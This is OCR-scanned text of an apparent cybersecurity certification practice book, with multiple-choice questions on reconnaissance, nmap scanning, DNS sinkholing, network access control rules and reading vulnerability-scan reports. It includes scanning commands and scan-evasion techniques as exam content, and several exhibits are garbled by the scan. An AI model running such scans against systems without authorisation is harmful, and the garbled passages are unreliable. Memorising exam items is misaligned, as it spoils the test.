C. Anti-malware software 

D. A next-generation firewall appliance 

Which of the following tools is not typically associated with the reconnaissance phase of a 
penetration test? 


A. Metasploit 


B. nmap 
C. Nessus 
D. Maltego 


What occurs when Alex uses the following command to perform an nmap scan of a 
network? 


nmap -sP 192.168.2.0/24 


A. A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range 
B. A scan of all hosts that respond to ping in the 192.168.0.0 to 192.168.255.255 


network range 
C. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network 
range 


D. ASYN-based portscan of all hosts in the 192.168.2.0 to 192.168.2.255 network 


range 
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177. As part of her malware analysis process, Kara builds a diagram of the components of the 
suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each 
subcomponent, adding it to her diagram. What is this process known as? 


Suspected 
Malware 
Packer 
Identified 
File 
Unpacked 
Base64 
Decoded 







System 


——}>| Components 
Resources p 


il 






config.ini 


suspect.dll 


screen.bin 






core.cab 





A. Decomposition 
B. Disassembly 
C. Reverse archiving 


D. Fingerprinting 


178. Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member 
during a penetration test. Which of the following types of attack is she least likely to be 
able to identify using a stateful packet inspection firewall? 


A. ASYN flood 

B. A SQL injection attack 
C. A port scan 

D. A DDoS attack 


179. Geoff’s remote scans of a target organization’s class C network block using nmap 
(nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather addi- 
tional reconnaissance information about the organization’s network, which of the follow- 
ing scanning techniques is most likely to provide additional detail? 


A. Use a UDP scan. 

B. Performa scan from on-site. 

C. Scan using the -p 1-65535 flag. 
D 


Use nmap’s IPS evasion techniques. 
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During her normal daily review process, Jennifer detects an external system that is sys- 
tematically conducting traceroute operations to each of the systems and devices in her 
network. What activity is most likely occurring? 


A. A regularly scheduled network scan from her company’s ISP 

B. A vulnerability scan 

C. Network topology reconnaissance 

D. Router probes to determine the best routes via BGP discovery 

Why does the U.S. government require Trusted Foundry and related requirements for 
technology? 

A. To control prices 

B. To ensure standards compatibility 

C. To prevent hardware-level compromise of devices 

D. To ensure U.S.-based supplier viability for strategic components 


As part of an externally accessible information review by their security team, Bob and Lisa 
receive information that the security team gathered including the following entry: 


Query Results: 

Router: Ashburn, VA - US 

Command: show bgp ipv4 unicast 10.81.254.195 
BGP routing table entry for 10.64.0.0/11 


Versions: 
Process bRIB/RIB SendTblVer 
Speaker 287479994 287479994 


Last Modified: Feb 22 09:16:16.154 for 8w0d 
Paths: (13 available, best #13) 
Advertised to update-groups (with more than one peer): 
0.1 0,14. 0.29 0.30 0,35 0.34 0,36 0,45 
Advertised to peers (in unique update groups): 
10.250 ,51,162 
Path #1: Received by speaker 0 
Not advertised to any peer 
1922 
10.242.151.65 (metric 6710) from (129.250.0.162) 
Origin IGP, metric 4294967294, localpref 98, valid, confed-internal 
Received Path ID 0, Local Path ID 0, version © 
Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922 
Originator: 10.250.0.162, Cluster list: 10.250.0.9 


Path #13: Received by speaker 0 
Advertised to update-groups (with more than one peer): 
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 


183. 
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Advertised to peers (in unique update groups): 
10.250 .351.162 

7922 
What type of tool could they use to gather this publicly available information about their 
systems in the future? 
A. nmap 
B. A BGP looking glass 
C. A BGP reflector 
D. A route/path assimilator 
A system that Jeff is responsible for has been experiencing consistent denial-of-service 
attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal com- 
puters in a concerted attack by sending large amounts of traffic from each system to flood 
a server, thus making it unable to respond to legitimate requests. What type of firewall 


rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from 
the attack itself is not the root problem? 


A. IP-based blacklisting 

B. Drop all SYN packets. 

C. Use a connection rate or volume-limiting filter per IP. 

D. Use a route-blocking filter that analyzes common LOIC routes. 

Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on 
his network. Which of the following practices will help to mitigate this risk? 

A. Implement an IPS. 

B. Implement a firewall. 

C. Disable promiscuous mode for NICs. 

D. Enable promiscuous mode for NICs. 

Geoff wants to gather a list of all Windows services and their current state using a 
command-line tool. What tool can he use to gather this information for later processing? 
A. svcctl -l 

B. service list 

C. service -l 

D. sc query 


While reviewing Shodan scan data for his organization, Adam finds the following infor- 
mation. What type of system has he discovered? 


BAS SCADA 
‘ HTTP/1.1 200 OK 
TDC Group Server: BAS SCADA Service HTTPserv: 22001 
Date: Mon, @7 Aug 2017 13:35:26 GMT 
am Denmark, Aarhus Cache-Control: no-cache, max-age=0, must-revalidate 
Details 


Content-Type: text/html 
Content-Length: 879 
Last-Modified: Tue, 17 Feb 2015 18:48:10 GMT 
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A. A botnet administration system 

B. A control and data acquisition system 
C. A noncaching web server 

D. ANAS 


Use the following scenario and image to answer the following three questions: 


While reviewing a system she is responsible for, Amanda notices that the system is per- 
forming poorly and runs htop to see a graphical representation of system resource usage. 
She sees the following information: 


T ETET TT | 1100. 0%) Tasks: 104, 254 thr; 3 running 
2 CIIIIIIIIIILIIIIIIIII]I||]||100.0%] Load average: 1.65 0.76 0.33 
Mem[||IIIIIIIIII[|]||||1.226/1.96G] Uptime: 02:16:45 

Swp[ | 1. 80M/1.26G] 





R 98.0 0.8 1:15. stress --vm-bytes 

1197 root 20 0 2293M 399M 76680 S 1.3 19.9 2:10.43 /usr/bin/gnome-sh 
1125 root 18 -2 122M 2960 2524S 1.3 0.1 0:13.88 /usr/bin/VBoxClie 
1025 root 20 © 455M 130M 28964 S 0.7 6.5 0:31.57 /usr/Lib/xorg/Xor 
1202 root 20 © 2293M 399M 76680 S 0.7 19.9 0:32.64 /usr/bin/gnome-sh 
1449 root 20 © 494M 40636 26516 S 0.0 2.0 0:03.69 /usr/Lib/gnome-te 
1280 root 20 © 740M 38212 27624 S 0.0 1.9 0:00.94 nautilus -n 
1120 root 20 © 122M 2960 2524S 0.0 0.1 0:13.88 /usr/bin/VBoxClie 
1201 root 20 © 2293M 399M 76680 S 0.0 19.9 0:32.44 /usr/bin/gnome-sh 
3812 root 20 © 23160 3564 2864 R 0.0 0.2 0:00.86 htop 
662 root 20 © 303M 2388 2000 S 0.0 0.1 0:00.56 /usr/sbin/VBoxSer 
1965 root 20 © 1080M 195M 74476 S 0.0 9.7 0:01.31 iceweasel 
932 Debian-gd 20 0 1526M 155M 75364 S 0.0 7.8 0:04.62 gnome-shell --mod 

© 303M 2388 2000 S 0.0 0.1 0:00.44 /usr/sbin/VBoxSer 


666 root 20 


187. What issue should Amanda report to the system administrator? 
A. High network utilization 
B. High memory utilization 


C. Insufficient swap space 
D. High CPU utilization 


188. What command could Amanda run to find the process with the highest CPU utilization if 
she did not have access to htop? 


A. ps 
B. top 
C. proc 
D. load 


189. What command can Amanda use to terminate the process? 
A. term 
B. stop 
C. end 
D. kill 


190. 


191. 


192. 
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During Geoff’s configuration of his organization’s network access control policies, he sets 
up client OS rules that include the following statements: 


ALLOW Windows 7 version *, Windows 10 version * 
ALLOW OSX version * 

ALLOW 10S 8.1, 10S 9 version * 

ALLOW Android 7.* 


After deploying this rule, he discovers that many devices on his network cannot connect. 
What issue is most likely occurring? 


A. Insecure clients 
B. Incorrect NAC client versions 
C. OS version mismatch 


D. Patch-level mismatch 


Lauren submits a suspected malware file to malwr.com and receives the following informa- 
tion about its behavior. What type of tool is malwr . com? 


Signatures 
A process attempted to delay the analysis task. 
File has been identified by at least one AntiVirus on VirusTotal as malicious 
The binary likely contains encrypted or compressed data. 
Creates a windows hook that monitors keyboard input (keylogger) 
Creates an Alternate Data Stream (ADS) 


Installs itself for autorun at Windows startup 


A reverse-engineering tool 
A static analysis sandbox 


A dynamic analysis sandbox 


99 9 > 


A decompiler sandbox 


Fred has been tasked with configuring his organization’s NAC rules to ensure that 
employees only have access that matches their job functions. Which of the following NAC 
criteria are least suited to filtering based on a user’s job? 


A. Time-based 
B. Rule-based 
C. Role-based 
D 


Location-based 
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193. Charles is investigating a process that he believes may be malicious. What Linux command 
can he use to determine what files that process has open? 


194. 


195. 


A. 
B. 
C. 
D. 


ps 
procmap 
sor 

fi Lemap 


After a popular website is hacked, Chris begins to hear reports that email addresses from 
his company’s domain are listed in the hacker’s data dump. Chris knows that the list 
includes passwords and is concerned that his users may have used the same password for 
the site and their own company account. If the hackers recovered MDS hashed passwords, 
how can he check them against the strong password hashes his company uses? 


A. 
B. 
C. 


D. 


Reverse the MDS hashes and then rehash using the company’s method and compare. 
Reverse the MDS and strong company hashes and then compare the password. 


Use rainbow tables to recover the passwords from the dump and then rehash using the 
company’s strong method and compare. 


Chris cannot accomplish this task; hashes cannot be reversed. 


As part of his active reconnaissance activities, Frank is provided with a shell account 
accessible via ssh. If Frank wants to run a default nmap scan on the network behind the 
firewall shown here, how can he accomplish this? 


99 D9 > 


Shell Host: 192.168.34.11 









External Host 





Internal 
Protected 
Network 
192.168.34.0- 
192.168.34.255 







ssh -t 192.168.34.11 nmap 192.168.34.0/24 
ssh -R 8080:192.168.34.11:8080 [remote account:remote password | 
ssh -proxy 192.168.11 [remote account:remote password] 


Frank cannot scan multiple ports with a single ssh command. 
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196. Angela captured the following packets during a reconnaissance effort run by her organiza- 
tion’s red team. What type of information are they looking for? 


Source Destination Protocy Lengtt Info 





Vulnerable web applications 
SQL injection 


Directory traversal attacks 


99 9 > 


Passwords 
197. Which sources are most commonly used to gather information about technologies a target 
organization uses during intelligence gathering? 
A. OSINT searches of support forums and social engineering 
B. Port scanning and social engineering 
C. Social media review and document metadata 
D. Social engineering and document metadata 
198. Geoff wants to prevent spammers from harvesting his organization’s public LDAP direc- 
tory. What technology should he implement? 
A. A firewall 
B. AnIDS 
C. Set hard limits 


D. Require authentication 


199. How can Saria remediate the issue shown here in the MBSA screenshot? 


Microsoft 


Baseline Security Analyzer 


Some user accounts (4 of 7) have blank or simple passwords, or could not be analyzed. 
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200. 


201. 


202. 


203. 


Chapter 1 = Domain 1: Threat Management 


Force all users to set a complex password. 


Set a minimum password age. 


Oo wo > 


Enforce password expiration. 

D. This is not a problem. 

Greg configures his next-generation firewall security device to forge DNS responses for 
known malicious domains. This results in users who attempt to visit sites hosted by those 


domains to see a landing page that Greg controls that advises them they were prevented 
from visiting a malicious site. What is this technique known as? 


A. DNS masquerading 

B. DNS sinkholing 

C. DNS re-sequencing 

D. DNS hierarchy revision 

While reviewing a malware sample, Adam discovers that code inside of it appears to be 


obfuscated. Which of the following encoding methods is commonly used to prevent code 
from being easily read by simply opening the file? 


A. QR coding 
B. Base64 

C. Base128 

D. XINT 


Jennifer is an Active Directory domain administrator for her company and knows that 

a quickly spreading botnet relies on a series of domain names for command and control 
and that preventing access to those domain names will cause the malware infection that 
connects to the botnet to fail to take further action. Which of the following actions is 
her best option if she wants to prevent off-site Windows users from connecting to botnet 
command-and-control systems? 


A. Force a BGP update. 

B. Set up a DNS sinkhole. 

C. Modify the hosts file. 

D. Install an anti-malware application. 

Charleen works for a U.S. government contractor that uses NIST’s definitions to describe 


threat categories. How should she categorize the threat posed by competitors that might 
seek to compromise her organization’s website? 


A. Adversarial 
B. Accidental 

C. Structural 
D 


Environmental 
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204. Chris has been asked to assess the technical impact of suspected reconnaissance performed 


205. 


206. 


207. 


against his organization. He is informed that a reliable source has discovered that a third 
party has been performing reconnaissance by querying WHOIS data. How should Chris 
categorize the technical impact of this type of reconnaissance? 


A. High 
B. Medium 
C. Low 


D. He cannot determine this from the information given. 


Frank is creating the scope worksheet for his organization’s penetration test. Which of the 


following techniques is not typically included in a penetration test? 


A. Reverse engineering 


B. Social engineering 


C. Denial-of-service attacks 


D. Physical penetration attempts 


Allan needs to immediately shut down a service called Explorer.exe on a Windows 
server. Which of the following methods is not a viable option for him? 


A. Use sc. 
B. Use wmic. 


C. Use secpol.msc. 


D. Use services.msc. 


Rick is reviewing flows of a system on his network and discovers the following flow logs. 


What is the system doing? 


ICMP "Echo request" 


Date flow start 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


2017-07-11 


Duration 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


04: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


58: 


59. 


59. 


59., 


59. 


59u 


59; 


59a 


59. 


59. 


59. 


Ses 


59. 


518 


518 


518 


518 


518 


518 


518 


518 


518 


518 


518 


518 


Proto 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


10. 


000 


000 


000 


000 


000 


000 


000 


000 


000 


000 


000 


000 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


ICMP 


Src IP Addr:Port->Dst IP Addr:Port 
10. 
10. 
10. 
10. 
10. 
10. 
10. 
10. 
10. 
10. 
10. 


10. 


1., 


I 


.1:0->10.2.2.6:8.0 


.6:0->10.1.1.1:0.0 


.1:0->10.2.2.7:8.0 


.7:0->10.1.1.1:0.0 


.1:0->10.2.2.8:8.0 


.810->10.1. 1.10.0 


wht OP 10,25 2.973<0 


.9:0->10.1.1.1:0.0 


LTO lO. 220 10T8 8 


.10:0->10.1.1.1:0.0 


pl Ole 22,0. LE 


.11:0->10.1.1.1:0.0 


Packets 
11 
11 
11 
11 
11 
11 
11 
11 
11 
11 
11 


11 


Bytes 
924 
924 
924 
924 
924 
924 
924 
924 
924 
924 
924 


924 


Flows 
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A port scan 
A failed three-way handshake 
A ping sweep 


Ipwp 


A traceroute 


208. Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of 
the following statements cannot be verified based on the packet capture shown for the host 
with IP address 10.0.2.4? 


Source Destination Protocol Lengtt Info 
1 Cadmusco_fa:25:8e Broadcast ARP 42 who has 10.0.2.4? Tell 10.0.2.15 
2 0.000258663 CadmusCo_92:5f:44 CadmusCo_fa:25:8e ARP 60 10.0.2.4 1s at 08:00:27:92:5f:44 
3 0.023177002 10.0.2.15 192.168.1.1 DNS 81 Standard query Oxfeba PTR 4.2.0.10.in-addr.arpa 
4 0. 


047498670 192.168.1.1 10.0.2.15 ONS 81 Standard query response Oxfeba No such name PTR 4.2.0.10.in-addr.arpa 


11 5.070143568 CadmuscCo_92:5f:44 CadmusCo_fa:25:8e ARP 60 who has 10.0.2.15? Te 
12 5.070164509 CadmusCo_fa:25:8e CadmusCo_92:5f:44 ARP 42 10.0.2.15 is at 08:00:27: fa:25:8e 





The host does not have a DNS entry. 
It is running a service on port 139. 


It is running a service on port 445. 
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It is a Windows system. 


209. Stacey encountered a system that shows as “filtered” and “firewalled” during an nmap 
scan. Which of the following techniques should she not consider as she is planning her 
next scan? 


A. Packet fragmentation 
B. Spoofing the source address 
C. Using decoy scans 
D. Spoofing the destination address 
210. When Charleen attempts to visit a website, she receives a DNS response from the DNS 


cache server that her organization relies on that points to the wrong IP address. What 
attack has occurred? 


A. DNS brute forcing 
B. ARP spoofing 

C. DNS poisoning 

D. MAC spoofing 


211. Alex has been asked to implement network controls to ensure that users who authenticate 
to the network are physically in the building that the network they are authenticating to 
serves. What technology and tool should he use to do this? 


A. Geo-IP and port security 

B. GPS location and NAC 

C. GPS location and port-security 
D. Geo-IP and NAC 
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212. As part of a penetration testing exercise, Lauren is placed on the defending team for her 
organization. What is this team often called? 


213. 


A. 
B. 
C. 
D. 


The red team 
The white team 
The blue team 
The yellow team 


Lucca wants to lock down a Cisco router, and chooses to use documentation that Cisco 
provides. What type of documentation is this? 


A. 


B. 
C. 
D 


Primary documentation 
OEM documentation 
Crowd-sourced documentation 


System documentation 





Domain 2: Vulnerability 
Management 





EXAM OBJECTIVES COVERED IN THIS 
CHAPTER: 


Y/Y 2.1 Given a scenario, implement an information security 
vulnerability management process. 


= Identification of requirements 

a Establish scanning frequency 

=» Configure tools to perform scans according to specification 
=» Execute scanning 

=» Generate reports 

=» Remediation 


=» Ongoing scanning and continuous monitoring 


Y/Y 2.2 Given a scenario, analyze the output resulting from a 
vulnerability scan. 


=» Analyze reports from a vulnerability scan 


= Validate results and correlate other data points 


Y/Y 2.3 Compare and contrast common vulnerabilities found 
in the following targets within an organization. 


a Servers 

=» Endpoints 

=» Network infrastructure 

=» Network appliances 

a Virtual infrastructure 

=» Mobile devices 

a Interconnected networks 

= Virtual private networks (VPNs) 

= Industrial Control Systems (ICSs) 
=» SCADA devices 
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1. Kim is preparing to deploy a new vulnerability scanner and wants to ensure that she can 
get the most accurate view of configuration issues on laptops belonging to traveling sales- 
people. Which technology will work best in this situation? 


A. Agent-based scanning 
B. Server-based scanning 
C. Passive network monitoring 
D. Noncredentialed scanning 
2. Carla runs a vulnerability scan of a new appliance that engineers are planning to place on 


her organization’s network and finds the results shown here. Of the actions listed, which 
would correct the highest criticality vulnerability? 


~ a = pE J E PFP == FreeBSD Based Device 


w Vulnerabilities (15) H O 





> EE 2 SSL Certificate - Expired port 443/tcp over SSL CVSS: - CVSS3: - New [dv] 
> EEEH 3 WINS Domain Controller Spoofing Vulnerability - Zero Day CVSS: - CVSS3: - Active [$~] 
> EEE 3 NetBIOS Name Conflict Vulnerability CVSS: - CVSS3: - Active fr 
> MINIM |3 NetBIOS Release Vulnerability CVSS: - CVSS3:- Active (qr) 
> Ba 2 Hidden RPC Services CVSS: - CVSS3: - Active +) 
> EE 2 NetBIOS Name Accessible CVSS: - CVSS3: - Active 7) 
> Ba 2 NTP Information Disclosure Vulnerability port 123/udp CVSS: - CVSS3:- Active [dv] 
> Ba 2 SSL Certificate - Self-Signed Certificate port 443/tcp over SSL CVSS: - CVSS3: - Active [$~] 
> Ba 2 SSL Certificate - Subject Common Name Does Not Match Server FQDN port 443/tcp over SSL CVSS: - CVSS3: - Active [$v] 
> EE 2 SSL Certificate - Signature Verification Failed Vulnerability port 443/tcp over SSL CVSS: - CVSS3: - Active ($~) 
>E 1 Presence of a Load-Balancing Device Detected port 443/tcp over SSL CVSS: - CVSS3:- Active +7) 
>E 1 Presence of a Load-Balancing Device Detected port 80/tcp CVSS: - CVSS3: - Active ~) 
> EEEH 3 SSL/TLS Compression Algorithm Information Leakage Vulnerability port 443/tcp over SSL CVSS: - CVSS3: - Fixed ($v) 
> EEEH 3 SSL/TLS Server supports TLSv1.0 port 443/tcp over SSL CVSS: - CVSS3: - Fixed 7) 
>E 1 SSL Certificate - Will Expire Soon port 443/tcp over SSL CVSS: - CVSS3: - Fixed +) 

A. Block the use of TLSv1.0. 

B. Replace the expired SSL certificate. 

C. Remove the load balancer. 


D. Correct the information leakage vulnerability. 


3. In what type of attack does the adversary leverage a position on a guest operating system 
to gain access to hardware resources assigned to other operating systems running in the 
same hardware environment? 


A. Buffer overflow 

B. Directory traversal 
C. VM escape 
D 


Cross-site scripting 
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4. Julie is developing a vulnerability scanning approach that will unify the diverse approaches 
used throughout her organization’s different operating locations. She would like to ensure 


that everyone uses the same terminology when referring to different applications and oper- 
ating systems. Which SCAP component can assist Julie with this task? 

A. CVE 

B. CPE 

C. CVSS 

D. OVAL 


5. Josh is responsible for the security of a network used to control systems within his organi- 
zation’s manufacturing plant. The network connects manufacturing equipment, sensors, 
and controllers. He runs a vulnerability scan on this network and discovers that several of 
the controllers are running very out-of-date firmware that introduces security issues. The 
manufacturer of the controllers is out of business. What action can Josh take to best reme- 
diate this vulnerability in an efficient manner? 


A. 
B. 


C. 
D. 


Develop a firmware update internally and apply it to the controllers. 


Post on an Internet message board seeking other organizations that have developed a 
patch. 


Ensure that the ICS is on an isolated network. 


Use an intrusion prevention system on the ICS network. 


6. Vic scanned a Windows server used in his organization and found the result shown here. 


The 


server is on an internal network with access limited to IT staff and is not part of a 


domain. How urgently should Vic remediate this vulnerability? 


v Be 3 Administrator Account'’s Password Does Not Expire 
First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 00:48:55 (GMT-0400) Times Detected: 22 Last Fixed: N/A 
QID: 90080 CVSS Base: 7.5W 
Category: Windows CVSS Temporal: 7.1 
CVE ID: - CVSS3 Base: ° 
Vendor Reference - CVSS3 Temporal: 
Bugtraq ID: - CVSS Environment: 
Service Modified: 08/03/2015 Asset Group: 
User Modified: - Collateral Damage Potential: 
Edited: No Target Distribution: 
PCI Vuln: Yes Confidentiality Requirement: 
Ticket State: Integrity Requirement: 
Availability Requirement: 
THREAT: 


The scanner probed the Security & Accounts Database (SAM) and found that the target Windows box's Administrator account has a password that does not expire. 


A. 
B. 


Vic should drop everything and remediate this vulnerability immediately. 


While Vic does not need to drop everything, this vulnerability requires urgent atten- 
tion and should be addressed quickly. 


This is a moderate vulnerability that can be scheduled for remediation at a convenient 
time. 


This vulnerability is informational in nature and may be left in place. 


66 


7. 


10. 
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Gina would like to leverage the Security Content Automation Protocol (SCAP) in her 
organization to bring a standard approach to their vulnerability management efforts. 
What SCAP component can Gina use to provide a common language for describing 
vulnerabilities? 


A. XCCDF 
B. CVE 
C. CPE 
D. CCE 


Rob’s manager recently asked him for an overview of any critical security issues that exist 
on his network. He looks at the reporting console of his vulnerability scanner and sees the 
options shown here. Which of the following report types would be his best likely starting 

point? 


%; Title a Type Vulnerability Data 
©) 2008 SANS Top 20 Report {A Host Based 
© Executive Report GW Host Based 
® High Severity Report GH Host Based 
® Payment Card Industry (PCI) Executive Report A Scan Based 
© Payment Card Industry (PCI) Technical Report {ZA Scan Based 
©) Qualys Patch Report © Host Based 
©) Qualys Top 20 Report {ZA Host Based 
©) Technical Report @q Host Based 
©) Unknown Device Report +f Scan Based 


Technical Report 
High Severity Report 
Qualys Patch Report 


Ipwp 


Unknown Device Report 


Wendy is the security administrator for a membership association that is planning to 
launch an online store. As part of this launch, she will become responsible for ensuring 
that the website and associated systems are compliant with all relevant standards. What 
regulatory regime specifically covers credit card information? 


A. PCI DSS 
B. FERPA 
C. HIPAA 
D. SOX 


During a port scan of a server, Miguel discovered that the following ports are open on the 
internal network: 


= TCP port 25 
= TCP port 80 
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= TCP port 110 
= TCP port 443 
= TCP port 1433 
= TCP port 3389 


The scan results provide evidence that a variety of services are running on this server. 
Which one of the following services is not indicated by the scan results? 


A. Web 


B. Database 
C. SSH 
D. RDP 


11. Beth is a software developer and she receives a report from her company’s cybersecurity 
team that a vulnerability scan detected a SQL injection vulnerability in one of her appli- 
cations. She examines her code and makes a modification in a test environment that she 
believes corrects the issue. What should she do next? 


A. Deploy the code to production immediately to resolve the vulnerability. 

B. Request a scan of the test environment to confirm that the issue is corrected. 

C. Mark the vulnerability as resolved and close the ticket. 

D. Hire a consultant to perform a penetration test to confirm that the vulnerability is resolved. 


12. George recently ran a port scan on a network device used by his organization. Which one 
of the following open ports represents the most significant possible security vulnerability? 


A. 22 


B. 23 
C. 161 
D. 443 


Questions 13 through 15 refer to the following scenario: 


Harold runs a vulnerability scan of a server that he is planning to move into production 
and finds the vulnerability shown here. 


v Be 3 SSL/TLS Server supports TLSv1.0 port 3389/tcp over SSL CVSS: - CVSS3:- Active ($v) 
First Detected: 09/25/2016 at 01:16:35 (GMT-0400) Last Detected: 04/09/2017 at 00:58:18 (GMT-0400) Times Detected: 15 Last Fixed: N/A 
QID: 38628 CVSS Base: 260 
Category: General remote services CVSS Temporal: 23 
CVE ID: : CVSS3 Base: ol!) 
Vendor Reference - CVSS3 Temporal: 0 
Bugtraq ID: 7 CVSS Environment: 
Service Modified: 07/14/2016 Asset Group: 
User Modified: Collateral Damage Potential: 
Edited: No 


Target Distribution: 
Confidentiality Requirement: 
Integrity Requirement: 
Availability Requirement: 


PCI Vuln: No 
Ticket State: 
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13. What operating system is most likely running on the server in this vulnerability scan 


report? 

A. macOS 
B. Windows 
C. CentOS 
D. RHEL 


14. Harold is preparing to correct the vulnerability. What service should he inspect to identify 
the issue? 


A. SSH 

B. HTTPS 
C. RDP 

D. SFTP 


15. Harold would like to secure the service affected by this vulnerability. Which one of the 
following protocols/versions would be an acceptable way to resolve the issue? 


A. SSL v2.0 
B. SSL v3.0 
C. TLS v1.0 


D. None of the above 


16. Seth found the vulnerability shown here in one of the systems on his network. What com- 
ponent requires a patch to correct this issue? 


v WM 5 VMware ESXi 5.5.0 Patch Release ESXi550-201703401-SG Missing (KB2149576) CVSS: - CVSS3:- New 
First Detected: 04/05/2017 at 21:10:27 (GMT-0400) Last Detected: 04/05/2017 at 21:10:27 (GMT-0400) Times Detected: 1 Last Fixed: N/A 
QID: 216120 CVSS Base: 6.6! 

Category: VMware CVSS Temporal: 4.9 
CVE ID: CVE-2017-4902 CVE-2017-4903 CVE- CVSS3 Base: - 
2017-4904 CVE-2017-4905 CVSS3 Temporal: 

Vendor Reference VMSA-2017-0006 CVSS Environment: 

Bugtraq ID: - Asset Group: 

Service Modified: 04/04/2017 Collateral Damage Potential: 
User Modified: - Target Distribution: 

Edited: No Confidentiality Requirement: 
PCI Vuln: Yes Integrity Requirement: 
Ticket State: Open Availability Requirement: 
THREAT: 


VMware ESXi is an enterprise level computer virtualization product. 

A local user on the guest system can trigger a heap overflow in SVGA to execute arbitrary code on the host system [CVE-2017-4902]. ESXi 6.0 is not affected. 

A local user on the guest system can trigger an uninitialized stack memory usage error in SVGA to execute arbitrary code on the host system [CVE-2017-4903]. 

A local user on the guest system can trigger an uninitialized stack memory usage error in the XHCI controller to execute arbitrary code on the host system [CVE-2017-4904]. On ESXi 5.5, the 
impact is limited to denial of service conditions. 

A local user on the guest system can trigger an uninitialized memory usage error to obtain potentially sensitive information on the host system [CVE-2017-4905]. 


IMPACT: 
A local user on the guest system can gain elevated privileges on the host system. 
A local user on the guest system can obtain potentially sensitive information on the host system. 


SOLUTION: 

To resolve this issue, upgrade to VMware ESXi Build 5230635 or the latest VMware ESXi build. 
Refer to VMware advisory KB2149576 for updates and build information. 

Patch: 

Following are links for downloading patches to fix the vulnerabilities: 

VMSA-2017-0006: VMware ESXi 5.5 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


A. Operating system 
B. VPN concentrator 
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C. Network router or switch 


D. Hypervisor 


17. Ken is responsible for the security of his organization’s network. His company recently 
contracted with a vendor that will be using laptops that he does not control to connect to 
their systems. Ken is concerned because he believes that these laptops contain vulnerabili- 
ties. What can he do to best mitigate the risk to other devices on the network without 
having administrative access to the devices? 


A. Apply any necessary security patches. 
B. Increase the encryption level of the VPN. 
C. Implement a jumpbox system. 


D. Require two-factor authentication. 


18. Quentin ran a vulnerability scan of a server in his organization and discovered the results 
shown here. Which one of the following actions is not required to resolve one of the 
vulnerabilities on this server? 


vb 83 Se a= E E oes 
~ Vulnerabilities (15) GE 
> EEE 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 
Apache Tomcat Input Validation Security Bypass Vulnerability 
Built-in Guest Account Not Renamed at Windows Target System 
Administrator Account's Password Does Not Expire 
Windows Remote Desktop Protocol Weak Encryption Method Allowed 
SSL/TLS use of weak RC4 cipher 
SSL/TLS Server supports TLSv1.0 
SSL/TLS Server supports TLSv1.0 
NetBIOS Name Accessible 
FIN-ACK Network Device Driver Frame Padding Information Disclosure Vulnerability 
SSL Certificate - Subject Common Name Does Not Match Server FQDN 
SSL Certificate - Signature Verification Failed Vulnerability 
SSL Certificate - Subject Common Name Does Not Match Server FQDN 
SSL Certificate - Self-Signed Certificate 
SSL Certificate - Signature Verification Failed Vulnerability 


"Vv YV YV YV YV YV YV YV Vv {YV VE VM Y 
N N N N NY NY NY WO HO WHO HD WHO WH W 


A. Reconfigure cipher support. 
B. Apply Window security patches. 
C. Obtain a new SSL certificate. 
D. Enhance account security policies. 
19. The presence of ____—_ triggers specific vulnerability scanning requirements 


based upon law or regulation. 

A. Credit card information 

B. Protected health information 

C. Personally identifiable information 
D 


Trade secret information 
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Questions 20 through 22 refer to the following scenario: 


Stella is analyzing the results of a vulnerability scan and comes across the vulnerability 
shown here on a server in her organization. The SharePoint service in question processes 
all of the organization’s work orders and is a critical part of the routine business workflow. 


First Detected: 09/28/2015 at 10:42:15 (GMT-0400) Last Detected: 04/05/2017 at 00:16:12 (GMT-0400) Times Detected: 20 Last Fixed: NA 

QID: 110235 CVSS Base: 9 

Category: Office Application CVSS Temporal: 7 

CVE ID: CVE-2014-0251 CVE-2014-1754 CVE- CVSS3 Base: - 
2014-1813 CVSS3 Temporal: 

Vendor Reference MS14-022 CVSS Environment: 

Bugtraq ID: 67288 Asset Group: 

Service Modified: 09/03/2014 Collateral Damage Potential: 

User Modified: - Target Distribution: - 

Edited: No Confidentiality Requirement: - 

PCI Vuln: Yes Integrity Requirement: - 

Ticket State: Open Availability Requirement: 

THREAT: 


A remote code execution vulnerability exists in Microsoft Web Applications. An authenticated attacker who successfully 

exploited this vulnerability could run arbitrary code in the security context of the W3WP service account. (CVE-2014-1813). 

An elevation of privilege vulnerability exists in Microsoft SharePoint Server. An attacker who successfully exploited this 

vulnerability could perform cross-site scripting attacks on affected systems and run script in the security context of the logged-on user. (CVE-2014-1754) 
Affected Software: 

Microsoft SharePoint Server 2007, Microsoft SharePoint Server 2010, Microsoft SharePoint Server 2013, Microsoft Office 

Web Apps 2010, Microsoft Office Web Apps Server 2013, Microsoft SharePoint Services 3.0, and Microsoft SharePoint Foundation 2010, Microsoft 


SharePoint Foundation 2013, Microsoft SharePoint Designer 2007, Microsoft SharePoint Designer 2010, and Microsoft SharePoint Designer 2013 
This security update is rated Critical for supported editions of Microsoft SharePoint Server. 


IMPACT: 
The most severe of these vulnerabilities could allow remote code execution if an authenticated attacker sends specially crafted page content to a target SharePoint server. 


SOLUTION: 

Customers are advised to refer to MS14-022. 

Patch: 

Following are links for downloading patches to fix the vulnerabilities: 
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20. What priority should Stella place on remediating this vulnerability? 
A. Stella should make this vulnerability one of her highest priorities. 
